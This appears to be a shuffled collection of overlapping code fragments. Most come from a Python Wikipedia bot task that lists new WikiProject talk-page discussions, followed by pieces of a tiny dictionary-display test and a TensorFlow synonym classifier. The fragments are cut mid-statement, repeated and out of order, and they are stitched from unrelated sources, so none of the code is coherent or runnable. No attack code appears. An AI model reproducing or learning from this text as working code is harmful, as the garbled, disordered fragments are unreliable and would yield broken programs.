AND rc_namespace", "given list of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable", "before + \"<noinclude>\\n\" + after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk =", "in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text", "try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError: self._logger.exception(\"Failed to parse [[%s]]\", title) return sections", "= str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk of", "[\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class", "= discussions[:self.DISCUSSIONS_PER_PAGE] for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y", "in the dict are those that have been updated in the given time", "<NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple", "\"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if news: summary", "{section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of", "discussion tuples.\"\"\" sections = {} for page in pages: title = join_full_title(self._bot.site, page.ns", "current, updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end =", "discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news =", "{{Clickable button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last 
updated|%(title)s}}}} %(discussions)s {{WPX", "{ \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") } for", "updated[title] elif title in current: sections[title] = current[title] discussions = [_Discussion(title, section.name, section.timestamp)", "_get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a dict mapping", "The only pages included in the dict are those that have been updated", "of section tuples. Given a WikiProject new discussions page, return all discussions currently", "project.\"\"\" self._logger.debug(\"Updating new discussions for %s\", project.name) title = project.name + \"/Discussions\" pages", "from datetime import datetime import re from reportsbot.task import Task from reportsbot.util import", "0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and", "template = \"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title,", "= self._bot.get_page(title) page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk,", "for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B %Y", "self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end", "WHERE rc_timestamp >= ? AND rc_timestamp < ? 
AND rc_namespace % 2 =", "= self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text) except mwparserfromhell.parser.ParserError:", "IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\": \"revisions\", \"rvprop\": \"content\",", "%m %d, %H:%M:%S\")) news = [disc.title for disc in discussions if disc.title not", "%B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples for", "section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True)", "and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value)", "AND rc_timestamp < ? AND rc_namespace % 2 = 1 AND rc_namespace !=", "between %s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts))", "cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in", "namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a", "title in updated: sections[title] = updated[title] elif title in current: sections[title] = current[title]", "startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\",", "project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions for", "% { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\") }", "tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title 
=", "join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title] = updated[title] elif", "= [ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B", "50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages = self._load_pages(chunk)", "\"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text =", "= \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable", "\"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return", "disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in discussions if disc.title", "given time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE", "\"\"\"Return a datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M,", "recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ? AND rc_namespace % 2", "page.title) if title in updated: sections[title] = updated[title] elif title in current: sections[title]", "lists of section tuples. 
Given a WikiProject new discussions page, return all discussions", "titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for", "scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod", "WikiProject's scope Copyright (C) 2015 <NAME>, 2016 <NAME> Licensed under MIT License: http://mitlicense.org", "\"\"\"Load a chunk of pages from the API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"]", "%Y (UTC)\") } for disc in discussions] fold = self.DISCUSSIONS_BEFORE_FOLD if len(discitems) >", "a dict mapping talk page titles to lists of section tuples. The only", "tuples. Given a WikiProject new discussions page, return all discussions currently listed. \"\"\"", "_process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\" self._logger.debug(\"Updating new discussions", "the given time range. 
\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges", "discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted", "\", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def _process(self, project,", "news def _save_discussions(self, project, title, discussions, news): \"\"\"Save the given list of discussions", "http://mitlicense.org \"\"\" from collections import namedtuple from datetime import datetime import re from", "return [(page[\"title\"], _get_rev(page)) for page in data[\"query\"][\"pages\"]] def _get_updated_discussions(self, start, end): \"\"\"Return a", "for title in sections for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions", "try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\":", "= project.get_members() current = self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title,", "chunk = titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try: sections[title]", "for %s pages\", len(titles)) sections = {} chunksize = 50 for start in", "of section tuples. 
The only pages included in the dict are those that", "sections = {} chunksize = 50 for start in range(0, len(titles), chunksize): chunk", "import join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section =", "= self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if", "Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\"", "discussions def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the most", "+ \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text", "self._save_discussions(project, title, discussions, news) def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated", "self._get_current_discussions(title) discussions, news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self):", "3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions", "\"\"\" text = self._bot.get_page(title).text code = mwparserfromhell.parse(text) discussions = {} for tmpl in", "of discussions to the given page title.\"\"\" text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return", "[[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for", "= self.DISCUSSIONS_BEFORE_FOLD if len(discitems) > fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist", "\".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def _process(self, project, updated):", 
"pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion =", "in updated: sections[title] = updated[title] elif title in current: sections[title] = current[title] discussions", "discussions, news): \"\"\"Save the given list of discussions to the given page title.\"\"\"", "(startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching", "\"\"\"Return a list of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text)", "for section in sections[title]] discussions.sort(key=lambda disc: disc.timestamp, reverse=True) discussions = discussions[:self.DISCUSSIONS_PER_PAGE] for disc", "timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections", "rc_namespace % 2 = 1 AND rc_namespace != 3 AND (rc_type = 0", "> fold: before = \"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\"", "timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def", "title, discussions, news): \"\"\"Save the given list of discussions to the given page", "\"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\":", "projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title) page.text = text % { \"title\": title,", "chunksize = 50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize] pages", "datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d %B", "str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), 
timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] =", "\"\\n\".join(discitems[:fold]) after = \"\\n\".join(discitems[fold:]) disclist = before + \"<noinclude>\\n\" + after + \"</noinclude>\"", "[join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\",", "%d, %H:%M:%S\")) news = [disc.title for disc in discussions if disc.title not in", "page.text = text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist", "not in current][:3] return discussions, news def _save_discussions(self, project, title, discussions, news): \"\"\"Save", "join_full_title import mwparserfromhell from pywikibot.data.api import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\",", "_Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions", "def run(self): start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating", "continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")): continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value)", "of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections = set()", "for section in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not", "import datetime import re from reportsbot.task import Task from reportsbot.util import join_full_title import", "for page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title", "text = \"\"\"<noinclude><div style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to 
WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content=", "template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y (UTC)\")", "discussions: discussions[title].add(section) else: discussions[title] = {section} return discussions def _process_discussions(self, pages, current, updated):", "= [join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s", "news): \"\"\"Save the given list of discussions to the given page title.\"\"\" text", "after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title)", "= text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist }", "%d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples", "{} chunksize = 50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize]", "continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section =", "continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a", "self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with self._bot.wikidb as cursor:", "%s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in", "tuples.\"\"\" sections = {} for page in pages: title = join_full_title(self._bot.site, page.ns +", "= mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE:", "to lists of section tuples. 
Given a WikiProject new discussions page, return all", "style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask", "= {} for page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title)", "discussions page, return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code =", "+= \": \" + \", \".join(\"[[%s]]\" % item for item in news) page.save(summary,", "not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip()", "NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE =", "DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ?", "news: summary += \": \" + \", \".join(\"[[%s]]\" % item for item in", "disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in discussions", "text): \"\"\"Return a list of section tuples for the given page.\"\"\" code =", "a sorted list of the most recent discussion tuples.\"\"\" sections = {} for", "button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list", "a WikiProject new discussions page, return all discussions currently listed. 
\"\"\" text =", "sections = {} for page in pages: title = join_full_title(self._bot.site, page.ns + 1,", "discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15", "= 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching", "\"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page", "page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\":", "discussions updated between %s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query,", "except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in", "[_Discussion(title, section.name, section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda disc:", "time range. 
\"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp", "[ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y", "endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\"))", "in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated:", "%H:%M:%S\")) news = [disc.title for disc in discussions if disc.title not in current][:3]", "= project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news =", "if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name =", "news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start =", "\"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of", "sections[title] = updated[title] elif title in current: sections[title] = current[title] discussions = [_Discussion(title,", "code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")):", "self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project, updated)", "\"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if", "start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts)", "for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, 
disc.timestamp.strftime(\"%Y %m %d,", "= 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s", "WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4", "a datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d", "in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue", "import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\",", "-- Provides a list of new discussions within a WikiProject's scope Copyright (C)", "button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the", "ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions:", "item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for", "# -*- coding: utf-8 -*- \"\"\" New Discussions -- Provides a list of", "% { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary =", "\" + \", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def", "for disc in discussions if disc.title not in current][:3] return discussions, news def", "Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import", "titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text)", "len(titles)) 
sections = {} chunksize = 50 for start in range(0, len(titles), chunksize):", "_Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task):", "2 = 1 AND rc_namespace != 3 AND (rc_type = 0 OR rc_type", "list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new", "\"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return", "\"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp <", "title): \"\"\"Return a dict mapping talk page titles to lists of section tuples.", "-*- coding: utf-8 -*- \"\"\" New Discussions -- Provides a list of new", "\"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in", "def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the most recent", "? AND rc_namespace % 2 = 1 AND rc_namespace != 3 AND (rc_type", "included in the dict are those that have been updated in the given", "4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or", "\"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX", "start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\")", "pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title]", "API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req =" ]
[ "a = {} b = {1: 2} c = {3: 4, 5: 6}", "c = {3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9:", "{} b = {1: 2} c = {3: 4, 5: 6} d =", "# tests for dictionary displays a = {} b = {1: 2} c", "= {3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\",", "for dictionary displays a = {} b = {1: 2} c = {3:", "tests for dictionary displays a = {} b = {1: 2} c =", "\"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print b print c", "displays a = {} b = {1: 2} c = {3: 4, 5:", "2} c = {3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\",", "d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print", "{1: 2} c = {3: 4, 5: 6} d = {7: \"seven\", 8:", "= {1: 2} c = {3: 4, 5: 6} d = {7: \"seven\",", "\"nine\", 10: \"one\" + \"zero\"} print a print b print c print d", "dictionary displays a = {} b = {1: 2} c = {3: 4,", "8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print b print", "4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\"", "6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"}", "= {} b = {1: 2} c = {3: 4, 5: 6} d", "<gh_stars>100-1000 # tests for dictionary displays a = {} b = {1: 2}", "5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" +", "{7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print", "b = {1: 2} c = {3: 4, 5: 6} d = {7:", "\"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print b", "{3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10:", "9: \"nine\", 10: \"one\" + \"zero\"} print a print b print c print", "= {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a" ]
[ "tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50", "= opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in", "readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp] print 'Reader Done'", "= (None, 2)) num = 30 num2 = 20 print num, num2 with", "2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test", "loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy =", "L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss =", "import readerX import tensorflow as tf import numpy as np import random import", "- 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix", "tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out,", "= tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2))", "b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2", "print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) #", "del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim))", "# piece = 999999 # sample_num = piece * 49 xInTemp, yInTemp =", "W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) #", "y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim),", "xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print 'cnt',", "sess.run([train_op, loss, W3], # 
feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val", "tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1))", "#这个文件用tf实现一个单层神经网络,用来判断两个词是否是同义词 #输入是readerX产生的X@200 和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy", "print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 =", "= np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is : ',sample_num", "'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3)", "np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is", "i] for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn =", "data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 =", "# L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2,", "import tensorflow as tf import numpy as np import random import gc data_dim", "tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst", "0.99: print '#' * 20 print accu print accu_test print cnt print 'Done'", "',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None,", "和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy as np", "accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print", "and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! 
